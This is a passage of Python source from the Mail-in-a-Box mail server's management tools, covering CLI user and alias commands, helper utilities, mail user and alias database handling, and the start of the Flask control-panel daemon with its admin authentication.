Try again.") continue break return first def setup_key_auth(mgmt_uri): with open('/var/lib/mailinabox/api.key', encoding='utf-8') as f: key = f.read().strip() auth_handler = urllib.request.HTTPBasicAuthHandler() auth_handler.add_password( realm='Mail-in-a-Box Management Server', uri=mgmt_uri, user=key, passwd='') opener = urllib.request.build_opener(auth_handler) urllib.request.install_opener(opener) if len(sys.argv) < 2: print("""Usage: {cli} user (lists users) {cli} user add [email protected] [password] {cli} user password [email protected] [password] {cli} user remove [email protected] {cli} user make-admin [email protected] {cli} user remove-admin [email protected] {cli} user admins (lists admins) {cli} user mfa show [email protected] (shows MFA devices for user, if any) {cli} user mfa disable [email protected] [id] (disables MFA for user) {cli} alias (lists aliases) {cli} alias add [email protected] [email protected] {cli} alias add [email protected] '[email protected], [email protected]' {cli} alias remove [email protected] Removing a mail user does not delete their mail folders on disk. It only prevents IMAP/SMTP login. """.format( cli="management/cli.py" )) elif sys.argv[1] == "user" and len(sys.argv) == 2: # Dump a list of users, one per line. Mark admins with an asterisk. users = mgmt("/mail/users?format=json", is_json=True) for domain in users: for user in domain["users"]: if user['status'] == 'inactive': continue print(user['email'], end='') if "admin" in user['privileges']: print("*", end='') print() elif sys.argv[1] == "user" and sys.argv[2] in {"add", "password"}: if len(sys.argv) < 5: email = input('email: ') if len(sys.argv) < 4 else sys.argv[3] pw = read_password() else: email, pw = sys.argv[3:5] if sys.argv[2] == "add": print(mgmt("/mail/users/add", { "email": email, "password": pw })) elif sys.argv[2] == "password": print(mgmt("/mail/users/password", { "email": email, "password": pw })) elif sys.argv[1] == "user" and sys.argv[2] == "remove" and len(sys.argv) == 4: print(mgmt("/mail/users/remove", { "email": sys.argv[3] })) elif sys.argv[1] == "user" and sys.argv[2] in {"make-admin", "remove-admin"} and len(sys.argv) == 4: action = 'add' if sys.argv[2] == 'make-admin' else 'remove' print(mgmt("/mail/users/privileges/" + action, { "email": sys.argv[3], "privilege": "admin" })) elif sys.argv[1] == "user" and sys.argv[2] == "admins": # Dump a list of admin users. users = mgmt("/mail/users?format=json", is_json=True) for domain in users: for user in domain["users"]: if "admin" in user['privileges']: print(user['email']) elif sys.argv[1] == "user" and len(sys.argv) == 5 and sys.argv[2:4] == ["mfa", "show"]: # Show MFA status for a user. status = mgmt("/mfa/status", { "user": sys.argv[4] }, is_json=True) W = csv.writer(sys.stdout) W.writerow(["id", "type", "label"]) for mfa in status["enabled_mfa"]: W.writerow([mfa["id"], mfa["type"], mfa["label"]]) elif sys.argv[1] == "user" and len(sys.argv) in {5, 6} and sys.argv[2:4] == ["mfa", "disable"]: # Disable MFA (all or a particular device) for a user. 
print(mgmt("/mfa/disable", { "user": sys.argv[4], "mfa-id": sys.argv[5] if len(sys.argv) == 6 else None })) elif sys.argv[1] == "alias" and len(sys.argv) == 2: print(mgmt("/mail/aliases")) elif sys.argv[1] == "alias" and sys.argv[2] == "add" and len(sys.argv) == 5: print(mgmt("/mail/aliases/add", { "address": sys.argv[3], "forwards_to": sys.argv[4] })) elif sys.argv[1] == "alias" and sys.argv[2] == "remove" and len(sys.argv) == 4: print(mgmt("/mail/aliases/remove", { "address": sys.argv[3] })) else: print("Invalid command-line arguments.") sys.exit(1) File: management/utils.py import os.path # DO NOT import non-standard modules. This module is imported by # migrate.py which runs on fresh machines before anything is installed # besides Python. # THE ENVIRONMENT FILE AT /etc/mailinabox.conf def load_environment(): # Load settings from /etc/mailinabox.conf. return load_env_vars_from_file("/etc/mailinabox.conf") def load_env_vars_from_file(fn): # Load settings from a KEY=VALUE file. import collections env = collections.OrderedDict() with open(fn, encoding="utf-8") as f: for line in f: env.setdefault(*line.strip().split("=", 1)) return env def save_environment(env): with open("/etc/mailinabox.conf", "w", encoding="utf-8") as f: for k, v in env.items(): f.write(f"{k}={v}\n") # THE SETTINGS FILE AT STORAGE_ROOT/settings.yaml. def write_settings(config, env): import rtyaml fn = os.path.join(env['STORAGE_ROOT'], 'settings.yaml') with open(fn, "w", encoding="utf-8") as f: f.write(rtyaml.dump(config)) def load_settings(env): import rtyaml fn = os.path.join(env['STORAGE_ROOT'], 'settings.yaml') try: with open(fn, encoding="utf-8") as f: config = rtyaml.load(f) if not isinstance(config, dict): raise ValueError # caught below return config except: return { } # UTILITIES def safe_domain_name(name): # Sanitize a domain name so it is safe to use as a file name on disk. import urllib.parse return urllib.parse.quote(name, safe='') def sort_domains(domain_names, env): # Put domain names in a nice sorted order. # The nice order will group domain names by DNS zone, i.e. the top-most # domain name that we serve that ecompasses a set of subdomains. Map # each of the domain names to the zone that contains them. Walk the domains # from shortest to longest since zones are always shorter than their # subdomains. zones = { } for domain in sorted(domain_names, key=len): for z in zones.values(): if domain.endswith("." + z): # We found a parent domain already in the list. zones[domain] = z break else: # 'break' did not occur: there is no parent domain, so it is its # own zone. zones[domain] = domain # Sort the zones. zone_domains = sorted(zones.values(), key = lambda d : ( # PRIMARY_HOSTNAME or the zone that contains it is always first. not (d == env['PRIMARY_HOSTNAME'] or env['PRIMARY_HOSTNAME'].endswith("." + d)), # Then just dumb lexicographically. d, )) # Now sort the domain names that fall within each zone. return sorted(domain_names, key = lambda d : ( # First by zone. zone_domains.index(zones[d]), # PRIMARY_HOSTNAME is always first within the zone that contains it. d != env['PRIMARY_HOSTNAME'], # Followed by any of its subdomains. not d.endswith("." + env['PRIMARY_HOSTNAME']), # Then in right-to-left lexicographic order of the .-separated parts of the name. 
list(reversed(d.split("."))), )) def sort_email_addresses(email_addresses, env): email_addresses = set(email_addresses) domains = {email.split("@", 1)[1] for email in email_addresses if "@" in email} ret = [] for domain in sort_domains(domains, env): domain_emails = {email for email in email_addresses if email.endswith("@" + domain)} ret.extend(sorted(domain_emails)) email_addresses -= domain_emails ret.extend(sorted(email_addresses)) # whatever is left return ret def shell(method, cmd_args, env=None, capture_stderr=False, return_bytes=False, trap=False, input=None): # A safe way to execute processes. # Some processes like apt-get require being given a sane PATH. import subprocess if env is None: env = {} env.update({ "PATH": "/sbin:/bin:/usr/sbin:/usr/bin" }) kwargs = { 'env': env, 'stderr': None if not capture_stderr else subprocess.STDOUT, } if method == "check_output" and input is not None: kwargs['input'] = input if not trap: ret = getattr(subprocess, method)(cmd_args, **kwargs) else: try: ret = getattr(subprocess, method)(cmd_args, **kwargs) code = 0 except subprocess.CalledProcessError as e: ret = e.output code = e.returncode if not return_bytes and isinstance(ret, bytes): ret = ret.decode("utf8") if not trap: return ret else: return code, ret def create_syslog_handler(): import logging.handlers handler = logging.handlers.SysLogHandler(address='/dev/log') handler.setLevel(logging.WARNING) return handler def du(path): # Computes the size of all files in the path, like the `du` command. # Based on http://stackoverflow.com/a/17936789. Takes into account # soft and hard links. total_size = 0 seen = set() for dirpath, _dirnames, filenames in os.walk(path): for f in filenames: fp = os.path.join(dirpath, f) try: stat = os.lstat(fp) except OSError: continue if stat.st_ino in seen: continue seen.add(stat.st_ino) total_size += stat.st_size return total_size def wait_for_service(port, public, env, timeout): # Block until a service on a given port (bound privately or publicly) # is taking connections, with a maximum timeout. import socket, time start = time.perf_counter() while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout/3) try: s.connect(("127.0.0.1" if not public else env['PUBLIC_IP'], port)) return True except OSError: if time.perf_counter() > start+timeout: return False time.sleep(min(timeout/4, 1)) def get_ssh_port(): port_value = get_ssh_config_value("port") if port_value: return int(port_value) return None def get_ssh_config_value(parameter_name): # Returns ssh configuration value for the provided parameter try: output = shell('check_output', ['sshd', '-T']) except FileNotFoundError: # sshd is not installed. That's ok. return None except subprocess.CalledProcessError: # error while calling shell command return None for line in output.split("\n"): if " " not in line: continue # there's a blank line at the end key, values = line.split(" ", 1) if key == parameter_name: return values # space-delimited if there are multiple values # Did not find the parameter! return None if __name__ == "__main__": from web_update import get_web_domains env = load_environment() domains = get_web_domains(env) for domain in domains: print(domain) File: management/email_administrator.py #!/usr/local/lib/mailinabox/env/bin/python # Reads in STDIN. If the stream is not empty, mail it to the system administrator. 
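#
# Example invocation (hypothetical):
#   echo "Nightly backup failed: disk is full" | management/email_administrator.py "Backup Status"
# mails the piped text to administrator@PRIMARY_HOSTNAME with that subject line.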
import sys import html import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText # In Python 3.6: #from email.message import Message from utils import load_environment # Load system environment info. env = load_environment() # Process command line args. subject = sys.argv[1] # Administrator's email address. admin_addr = "administrator@" + env['PRIMARY_HOSTNAME'] # Read in STDIN. content = sys.stdin.read().strip() # If there's nothing coming in, just exit. if content == "": sys.exit(0) # create MIME message msg = MIMEMultipart('alternative') # In Python 3.6: #msg = Message() msg['From'] = '"{}" <{}>'.format(env['PRIMARY_HOSTNAME'], admin_addr) msg['To'] = admin_addr msg['Subject'] = "[{}] {}".format(env['PRIMARY_HOSTNAME'], subject) content_html = f'<html><body><pre style="overflow-x: scroll; white-space: pre;">{html.escape(content)}</pre></body></html>' msg.attach(MIMEText(content, 'plain')) msg.attach(MIMEText(content_html, 'html')) # In Python 3.6: #msg.set_content(content) #msg.add_alternative(content_html, "html") # send smtpclient = smtplib.SMTP('127.0.0.1', 25) smtpclient.ehlo() smtpclient.sendmail( admin_addr, # MAIL FROM admin_addr, # RCPT TO msg.as_string()) smtpclient.quit() File: management/mailconfig.py #!/usr/local/lib/mailinabox/env/bin/python # NOTE: # This script is run both using the system-wide Python 3 # interpreter (/usr/bin/python3) as well as through the # virtualenv (/usr/local/lib/mailinabox/env). So only # import packages at the top level of this script that # are installed in *both* contexts. We use the system-wide # Python 3 in setup/questions.sh to validate the email # address entered by the user. import os, sqlite3, re import utils from email_validator import validate_email as validate_email_, EmailNotValidError import idna def validate_email(email, mode=None): # Checks that an email address is syntactically valid. Returns True/False. # An email address may contain ASCII characters only because Dovecot's # authentication mechanism gets confused with other character encodings. # # When mode=="user", we're checking that this can be a user account name. # Dovecot has tighter restrictions - letters, numbers, underscore, and # dash only! # # When mode=="alias", we're allowing anything that can be in a Postfix # alias table, i.e. omitting the local part ("@domain.tld") is OK. # Check the syntax of the address. try: validate_email_(email, allow_smtputf8=False, check_deliverability=False, allow_empty_local=(mode=="alias") ) except EmailNotValidError: return False if mode == 'user': # There are a lot of characters permitted in email addresses, but # Dovecot's sqlite auth driver seems to get confused if there are any # unusual characters in the address. Bah. Also note that since # the mailbox path name is based on the email address, the address # shouldn't be absurdly long and must not have a forward slash. # Our database is case sensitive (oops), which affects mail delivery # (Postfix always queries in lowercase?), so also only permit lowercase # letters. if len(email) > 255: return False if re.search(r'[^\@\.a-z0-9_\-]+', email): return False # Everything looks good. return True def sanitize_idn_email_address(email): # The user may enter Unicode in an email address. Convert the domain part # to IDNA before going into our database. Leave the local part alone --- # although validate_email will reject non-ASCII characters. # # The domain name system only exists in ASCII, so it doesn't make sense # to store domain names in Unicode. 
We want to store what is meaningful # to the underlying protocols. try: localpart, domainpart = email.split("@") domainpart = idna.encode(domainpart).decode('ascii') return localpart + "@" + domainpart except (ValueError, idna.IDNAError): # ValueError: String does not have a single @-sign, so it is not # a valid email address. IDNAError: Domain part is not IDNA-valid. # Validation is not this function's job, so return value unchanged. # If there are non-ASCII characters it will be filtered out by # validate_email. return email def prettify_idn_email_address(email): # This is the opposite of sanitize_idn_email_address. We store domain # names in IDNA in the database, but we want to show Unicode to the user. try: localpart, domainpart = email.split("@") domainpart = idna.decode(domainpart.encode("ascii")) return localpart + "@" + domainpart except (ValueError, UnicodeError, idna.IDNAError): # Failed to decode IDNA, or the email address does not have a # single @-sign. Should never happen. return email def is_dcv_address(email): email = email.lower() return any(email.startswith((localpart + "@", localpart + "+")) for localpart in ("admin", "administrator", "postmaster", "hostmaster", "webmaster", "abuse")) def open_database(env, with_connection=False): conn = sqlite3.connect(env["STORAGE_ROOT"] + "/mail/users.sqlite") if not with_connection: return conn.cursor() else: return conn, conn.cursor() def get_mail_users(env): # Returns a flat, sorted list of all user accounts. c = open_database(env) c.execute('SELECT email FROM users') users = [ row[0] for row in c.fetchall() ] return utils.sort_email_addresses(users, env) def get_mail_users_ex(env, with_archived=False): # Returns a complex data structure of all user accounts, optionally # including archived (status="inactive") accounts. # # [ # { # domain: "domain.tld", # users: [ # { # email: "[email protected]", # privileges: [ "priv1", "priv2", ... ], # status: "active" | "inactive", # }, # ... # ] # }, # ... # ] # Get users and their privileges. users = [] active_accounts = set() c = open_database(env) c.execute('SELECT email, privileges FROM users') for email, privileges in c.fetchall(): active_accounts.add(email) user = { "email": email, "privileges": parse_privs(privileges), "status": "active", } users.append(user) # Add in archived accounts. if with_archived: root = os.path.join(env['STORAGE_ROOT'], 'mail/mailboxes') for domain in os.listdir(root): if os.path.isdir(os.path.join(root, domain)): for user in os.listdir(os.path.join(root, domain)): email = user + "@" + domain mbox = os.path.join(root, domain, user) if email in active_accounts: continue user = { "email": email, "privileges": [], "status": "inactive", "mailbox": mbox, } users.append(user) # Group by domain. domains = { } for user in users: domain = get_domain(user["email"]) if domain not in domains: domains[domain] = { "domain": domain, "users": [] } domains[domain]["users"].append(user) # Sort domains. domains = [domains[domain] for domain in utils.sort_domains(domains.keys(), env)] # Sort users within each domain first by status then lexicographically by email address. for domain in domains: domain["users"].sort(key = lambda user : (user["status"] != "active", user["email"])) return domains def get_admins(env): # Returns a set of users with admin privileges. 
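	# (Privileges are stored newline-separated in the users table and parsed into
	# a list by parse_privs, so "admin" shows up as one entry of user["privileges"].)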
users = set() for domain in get_mail_users_ex(env): for user in domain["users"]: if "admin" in user["privileges"]: users.add(user["email"]) return users def get_mail_aliases(env): # Returns a sorted list of tuples of (address, forward-tos, permitted-senders, auto). c = open_database(env) c.execute('SELECT source, destination, permitted_senders, 0 as auto FROM aliases UNION SELECT source, destination, permitted_senders, 1 as auto FROM auto_aliases') aliases = { row[0]: row for row in c.fetchall() } # make dict # put in a canonical order: sort by domain, then by email address lexicographically return [ aliases[address] for address in utils.sort_email_addresses(aliases.keys(), env) ] def get_mail_aliases_ex(env): # Returns a complex data structure of all mail aliases, similar # to get_mail_users_ex. # # [ # { # domain: "domain.tld", # alias: [ # { # address: "[email protected]", # IDNA-encoded # address_display: "[email protected]", # full Unicode # forwards_to: ["[email protected]", "[email protected]", ...], # permitted_senders: ["[email protected]", "[email protected]", ...] OR null, # auto: True|False # }, # ... # ] # }, # ... # ] domains = {} for address, forwards_to, permitted_senders, auto in get_mail_aliases(env): # skip auto domain maps since these are not informative in the control panel's aliases list if auto and address.startswith("@"): continue # get alias info domain = get_domain(address) # add to list if domain not in domains: domains[domain] = { "domain": domain, "aliases": [], } domains[domain]["aliases"].append({ "address": address, "address_display": prettify_idn_email_address(address), "forwards_to": [prettify_idn_email_address(r.strip()) for r in forwards_to.split(",")], "permitted_senders": [prettify_idn_email_address(s.strip()) for s in permitted_senders.split(",")] if permitted_senders is not None else None, "auto": bool(auto), }) # Sort domains. domains = [domains[domain] for domain in utils.sort_domains(domains.keys(), env)] # Sort aliases within each domain first by required-ness then lexicographically by address. for domain in domains: domain["aliases"].sort(key = lambda alias : (alias["auto"], alias["address"])) return domains def get_domain(emailaddr, as_unicode=True): # Gets the domain part of an email address. Turns IDNA # back to Unicode for display. ret = emailaddr.split('@', 1)[1] if as_unicode: try: ret = idna.decode(ret.encode('ascii')) except (ValueError, UnicodeError, idna.IDNAError): # Looks like we have an invalid email address in # the database. Now is not the time to complain. pass return ret def get_mail_domains(env, filter_aliases=lambda alias : True, users_only=False): # Returns the domain names (IDNA-encoded) of all of the email addresses # configured on the system. If users_only is True, only return domains # with email addresses that correspond to user accounts. Exclude Unicode # forms of domain names listed in the automatic aliases table. 
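	# (For example, web_update.get_web_domains calls this with users_only=True to
	# decide which domains get autoconfig./autodiscover. subdomains, and with the
	# defaults to serve a website for every mail domain.)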
domains = [] domains.extend([get_domain(login, as_unicode=False) for login in get_mail_users(env)]) if not users_only: domains.extend([get_domain(address, as_unicode=False) for address, _, _, auto in get_mail_aliases(env) if filter_aliases(address) and not auto ]) return set(domains) def add_mail_user(email, pw, privs, env): # validate email if email.strip() == "": return ("No email address provided.", 400) elif not validate_email(email): return ("Invalid email address.", 400) elif not validate_email(email, mode='user'): return ("User account email addresses may only use the lowercase ASCII letters a-z, the digits 0-9, underscore (_), hyphen (-), and period (.).", 400) elif is_dcv_address(email) and len(get_mail_users(env)) > 0: # Make domain control validation hijacking a little harder to mess up by preventing the usual # addresses used for DCV from being user accounts. Except let it be the first account because # during box setup the user won't know the rules. return ("You may not make a user account for that address because it is frequently used for domain control validation. Use an alias instead if necessary.", 400) # validate password validate_password(pw) # validate privileges if privs is None or privs.strip() == "": privs = [] else: privs = privs.split("\n") for p in privs: validation = validate_privilege(p) if validation: return validation # get the database conn, c = open_database(env, with_connection=True) # hash the password pw = hash_password(pw) # add the user to the database try: c.execute("INSERT INTO users (email, password, privileges) VALUES (?, ?, ?)", (email, pw, "\n".join(privs))) except sqlite3.IntegrityError: return ("User already exists.", 400) # write databasebefore next step conn.commit() # Update things in case any new domains are added. return kick(env, "mail user added") def set_mail_password(email, pw, env): # validate that password is acceptable validate_password(pw) # hash the password pw = hash_password(pw) # update the database conn, c = open_database(env, with_connection=True) c.execute("UPDATE users SET password=? WHERE email=?", (pw, email)) if c.rowcount != 1: return ("That's not a user (%s)." % email, 400) conn.commit() return "OK" def hash_password(pw): # Turn the plain password into a Dovecot-format hashed password, meaning # something like "{SCHEME}hashedpassworddata". # http://wiki2.dovecot.org/Authentication/PasswordSchemes return utils.shell('check_output', ["/usr/bin/doveadm", "pw", "-s", "SHA512-CRYPT", "-p", pw]).strip() def get_mail_password(email, env): # Gets the hashed password for a user. Passwords are stored in Dovecot's # password format, with a prefixed scheme. # http://wiki2.dovecot.org/Authentication/PasswordSchemes # update the database c = open_database(env) c.execute('SELECT password FROM users WHERE email=?', (email,)) rows = c.fetchall() if len(rows) != 1: raise ValueError("That's not a user (%s)." % email) return rows[0][0] def remove_mail_user(email, env): # remove conn, c = open_database(env, with_connection=True) c.execute("DELETE FROM users WHERE email=?", (email,)) if c.rowcount != 1: return ("That's not a user (%s)." % email, 400) conn.commit() # Update things in case any domains are removed. 
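	# (kick() below regenerates the auto-alias table and re-runs the DNS and
	# nginx updates so configuration for a now-unused domain gets dropped.)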
return kick(env, "mail user removed") def parse_privs(value): return [p for p in value.split("\n") if p.strip() != ""] def get_mail_user_privileges(email, env, empty_on_error=False): # get privs c = open_database(env) c.execute('SELECT privileges FROM users WHERE email=?', (email,)) rows = c.fetchall() if len(rows) != 1: if empty_on_error: return [] return ("That's not a user (%s)." % email, 400) return parse_privs(rows[0][0]) def validate_privilege(priv): if "\n" in priv or priv.strip() == "": return ("That's not a valid privilege (%s)." % priv, 400) return None def add_remove_mail_user_privilege(email, priv, action, env): # validate validation = validate_privilege(priv) if validation: return validation # get existing privs, but may fail privs = get_mail_user_privileges(email, env) if isinstance(privs, tuple): return privs # error # update privs set if action == "add": if priv not in privs: privs.append(priv) elif action == "remove": privs = [p for p in privs if p != priv] else: return ("Invalid action.", 400) # commit to database conn, c = open_database(env, with_connection=True) c.execute("UPDATE users SET privileges=? WHERE email=?", ("\n".join(privs), email)) if c.rowcount != 1: return ("Something went wrong.", 400) conn.commit() return "OK" def add_mail_alias(address, forwards_to, permitted_senders, env, update_if_exists=False, do_kick=True): # convert Unicode domain to IDNA address = sanitize_idn_email_address(address) # Our database is case sensitive (oops), which affects mail delivery # (Postfix always queries in lowercase?), so force lowercase. address = address.lower() # validate address address = address.strip() if address == "": return ("No email address provided.", 400) if not validate_email(address, mode='alias'): return ("Invalid email address (%s)." % address, 400) # validate forwards_to validated_forwards_to = [] forwards_to = forwards_to.strip() # extra checks for email addresses used in domain control validation is_dcv_source = is_dcv_address(address) # Postfix allows a single @domain.tld as the destination, which means # the local part on the address is preserved in the rewrite. We must # try to convert Unicode to IDNA first before validating that it's a # legitimate alias address. Don't allow this sort of rewriting for # DCV source addresses. r1 = sanitize_idn_email_address(forwards_to) if validate_email(r1, mode='alias') and not is_dcv_source: validated_forwards_to.append(r1) else: # Parse comma and \n-separated destination emails & validate. In this # case, the forwards_to must be complete email addresses. for line in forwards_to.split("\n"): for email in line.split(","): email = email.strip() if email == "": continue email = sanitize_idn_email_address(email) # Unicode => IDNA # Strip any +tag from email alias and check privileges privileged_email = re.sub(r"(?=\+)[^@]*(?=@)",'',email) if not validate_email(email): return ("Invalid receiver email address (%s)." % email, 400) if is_dcv_source and not is_dcv_address(email) and "admin" not in get_mail_user_privileges(privileged_email, env, empty_on_error=True): # Make domain control validation hijacking a little harder to mess up by # requiring aliases for email addresses typically used in DCV to forward # only to accounts that are administrators on this system. 
return ("This alias can only have administrators of this system as destinations because the address is frequently used for domain control validation.", 400) validated_forwards_to.append(email) # validate permitted_senders valid_logins = get_mail_users(env) validated_permitted_senders = [] permitted_senders = permitted_senders.strip() # Parse comma and \n-separated sender logins & validate. The permitted_senders must be # valid usernames. for line in permitted_senders.split("\n"): for login in line.split(","): login = login.strip() if login == "": continue if login not in valid_logins: return ("Invalid permitted sender: %s is not a user on this system." % login, 400) validated_permitted_senders.append(login) # Make sure the alias has either a forwards_to or a permitted_sender. if len(validated_forwards_to) + len(validated_permitted_senders) == 0: return ("The alias must either forward to an address or have a permitted sender.", 400) # save to db forwards_to = ",".join(validated_forwards_to) permitted_senders = None if len(validated_permitted_senders) == 0 else ",".join(validated_permitted_senders) conn, c = open_database(env, with_connection=True) try: c.execute("INSERT INTO aliases (source, destination, permitted_senders) VALUES (?, ?, ?)", (address, forwards_to, permitted_senders)) return_status = "alias added" except sqlite3.IntegrityError: if not update_if_exists: return ("Alias already exists (%s)." % address, 400) else: c.execute("UPDATE aliases SET destination = ?, permitted_senders = ? WHERE source = ?", (forwards_to, permitted_senders, address)) return_status = "alias updated" conn.commit() if do_kick: # Update things in case any new domains are added. return kick(env, return_status) return None def remove_mail_alias(address, env, do_kick=True): # convert Unicode domain to IDNA address = sanitize_idn_email_address(address) # remove conn, c = open_database(env, with_connection=True) c.execute("DELETE FROM aliases WHERE source=?", (address,)) if c.rowcount != 1: return ("That's not an alias (%s)." % address, 400) conn.commit() if do_kick: # Update things in case any domains are removed. return kick(env, "alias removed") return None def add_auto_aliases(aliases, env): conn, c = open_database(env, with_connection=True) c.execute("DELETE FROM auto_aliases") for source, destination in aliases.items(): c.execute("INSERT INTO auto_aliases (source, destination) VALUES (?, ?)", (source, destination)) conn.commit() def get_system_administrator(env): return "administrator@" + env['PRIMARY_HOSTNAME'] def get_required_aliases(env): # These are the aliases that must exist. aliases = set() # The system administrator alias is required. aliases.add(get_system_administrator(env)) # The hostmaster alias is exposed in the DNS SOA for each zone. aliases.add("hostmaster@" + env['PRIMARY_HOSTNAME']) # Get a list of domains we serve mail for, except ones for which the only # email on that domain are the required aliases or a catch-all/domain-forwarder. real_mail_domains = get_mail_domains(env, filter_aliases = lambda alias : not alias.startswith("postmaster@") and not alias.startswith("admin@") and not alias.startswith("abuse@") and not alias.startswith("@") ) # Create postmaster@, admin@ and abuse@ for all domains we serve # mail on. postmaster@ is assumed to exist by our Postfix configuration. # admin@isn't anything, but it might save the user some trouble e.g. when # buying an SSL certificate. 
# abuse@ is part of RFC2142: https://www.ietf.org/rfc/rfc2142.txt for domain in real_mail_domains: aliases.add("postmaster@" + domain) aliases.add("admin@" + domain) aliases.add("abuse@" + domain) return aliases def kick(env, mail_result=None): results = [] # Include the current operation's result in output. if mail_result is not None: results.append(mail_result + "\n") auto_aliases = { } # Map required aliases to the administrator alias (which should be created manually). administrator = get_system_administrator(env) required_aliases = get_required_aliases(env) for alias in required_aliases: if alias == administrator: continue # don't make an alias from the administrator to itself --- this alias must be created manually auto_aliases[alias] = administrator # Add domain maps from Unicode forms of IDNA domains to the ASCII forms stored in the alias table. for domain in get_mail_domains(env): try: domain_unicode = idna.decode(domain.encode("ascii")) if domain == domain_unicode: continue # not an IDNA/Unicode domain auto_aliases["@" + domain_unicode] = "@" + domain except (ValueError, UnicodeError, idna.IDNAError): continue add_auto_aliases(auto_aliases, env) # Remove auto-generated postmaster/admin/abuse alises from the main aliases table. # They are now stored in the auto_aliases table. for address, forwards_to, _permitted_senders, auto in get_mail_aliases(env): user, domain = address.split("@") if user in {"postmaster", "admin", "abuse"} \ and address not in required_aliases \ and forwards_to == get_system_administrator(env) \ and not auto: remove_mail_alias(address, env, do_kick=False) results.append(f"removed alias {address} (was to {forwards_to}; domain no longer used for email)\n") # Update DNS and nginx in case any domains are added/removed. from dns_update import do_dns_update results.append( do_dns_update(env) ) from web_update import do_web_update results.append( do_web_update(env) ) return "".join(s for s in results if s != "") def validate_password(pw): # validate password if pw.strip() == "": msg = "No password provided." raise ValueError(msg) if len(pw) < 8: msg = "Passwords must be at least eight characters." raise ValueError(msg) if __name__ == "__main__": import sys if len(sys.argv) > 2 and sys.argv[1] == "validate-email": # Validate that we can create a Dovecot account for a given string. if validate_email(sys.argv[2], mode='user'): sys.exit(0) else: sys.exit(1) if len(sys.argv) > 1 and sys.argv[1] == "update": from utils import load_environment print(kick(load_environment())) File: management/daemon.py #!/usr/local/lib/mailinabox/env/bin/python3 # # The API can be accessed on the command line, e.g. 
use `curl` like so: # curl --user $(</var/lib/mailinabox/api.key): http://localhost:10222/mail/users # # During development, you can start the Mail-in-a-Box control panel # by running this script, e.g.: # # service mailinabox stop # stop the system process # DEBUG=1 management/daemon.py # service mailinabox start # when done debugging, start it up again import os, os.path, re, json, time import multiprocessing.pool from functools import wraps from flask import Flask, request, render_template, Response, send_from_directory, make_response import auth, utils from mailconfig import get_mail_users, get_mail_users_ex, get_admins, add_mail_user, set_mail_password, remove_mail_user from mailconfig import get_mail_user_privileges, add_remove_mail_user_privilege from mailconfig import get_mail_aliases, get_mail_aliases_ex, get_mail_domains, add_mail_alias, remove_mail_alias from mfa import get_public_mfa_state, provision_totp, validate_totp_secret, enable_mfa, disable_mfa import contextlib env = utils.load_environment() auth_service = auth.AuthService() # We may deploy via a symbolic link, which confuses flask's template finding. me = __file__ with contextlib.suppress(OSError): me = os.readlink(__file__) # for generating CSRs we need a list of country codes csr_country_codes = [] with open(os.path.join(os.path.dirname(me), "csr_country_codes.tsv"), encoding="utf-8") as f: for line in f: if line.strip() == "" or line.startswith("#"): continue code, name = line.strip().split("\t")[0:2] csr_country_codes.append((code, name)) app = Flask(__name__, template_folder=os.path.abspath(os.path.join(os.path.dirname(me), "templates"))) # Decorator to protect views that require a user with 'admin' privileges. def authorized_personnel_only(viewfunc): @wraps(viewfunc) def newview(*args, **kwargs): # Authenticate the passed credentials, which is either the API key or a username:password pair # and an optional X-Auth-Token token. error = None privs = [] try: email, privs = auth_service.authenticate(request, env) except ValueError as e: # Write a line in the log recording the failed login, unless no authorization header # was given which can happen on an initial request before a 403 response. if "Authorization" in request.headers: log_failed_login(request) # Authentication failed. error = str(e) # Authorized to access an API view? if "admin" in privs: # Store the email address of the logged in user so it can be accessed # from the API methods that affect the calling user. request.user_email = email request.user_privs = privs # Call view func. return viewfunc(*args, **kwargs) if not error: error = "You are not an administrator." # Not authorized. Return a 401 (send auth) and a prompt to authorize by default. status = 401 headers = { 'WWW-Authenticate': f'Basic realm="{auth_service.auth_realm}"', 'X-Reason': error, } if request.headers.get('X-Requested-With') == 'XMLHttpRequest': # Don't issue a 401 to an AJAX request because the user will # be prompted for credentials, which is not helpful. status = 403 headers = None if request.headers.get('Accept') in {None, "", "*/*"}: # Return plain text output. return Response(error+"\n", status=status, mimetype='text/plain', headers=headers) else: # Return JSON output. 
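			# (e.g. {"status": "error", "reason": "You are not an administrator."})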
return Response(json.dumps({ "status": "error", "reason": error, })+"\n", status=status, mimetype='application/json', headers=headers) return newview @app.errorhandler(401) def unauthorized(error): return auth_service.make_unauthorized_response() def json_response(data, status=200): return Response(json.dumps(data, indent=2, sort_keys=True)+'\n', status=status, mimetype='application/json') ################################### # Control Panel (unauthenticated views) @app.route('/') def index(): # Render the control panel. This route does not require user authentication # so it must be safe! no_users_exist = (len(get_mail_users(env)) == 0) no_admins_exist = (len(get_admins(env)) == 0) import boto3.s3 backup_s3_hosts = [(r, f"s3.{r}.amazonaws.com") for r in boto3.session.Session().get_available_regions('s3')] return render_template('index.html', hostname=env['PRIMARY_HOSTNAME'], storage_root=env['STORAGE_ROOT'], no_users_exist=no_users_exist, no_admins_exist=no_admins_exist, backup_s3_hosts=backup_s3_hosts, csr_country_codes=csr_country_codes, ) # Create a session key by checking the username/password in the Authorization header. @app.route('/login', methods=["POST"]) def login(): # Is the caller authorized? try: email, privs = auth_service.authenticate(request, env, login_only=True) except ValueError as e: if "missing-totp-token" in str(e): return json_response({ "status": "missing-totp-token", "reason": str(e), }) else: # Log the failed login log_failed_login(request) return json_response({ "status": "invalid", "reason": str(e), }) # Return a new session for the user. resp = { "status": "ok", "email": email, "privileges": privs, "api_key": auth_service.create_session_key(email, env, type='login'), } app.logger.info(f"New login session created for {email}") # Return. 
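	# (resp has the shape {"status": "ok", "email": ..., "privileges": [...],
	# "api_key": ...}; the api_key is a per-login session key minted by
	# auth_service.create_session_key above.)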
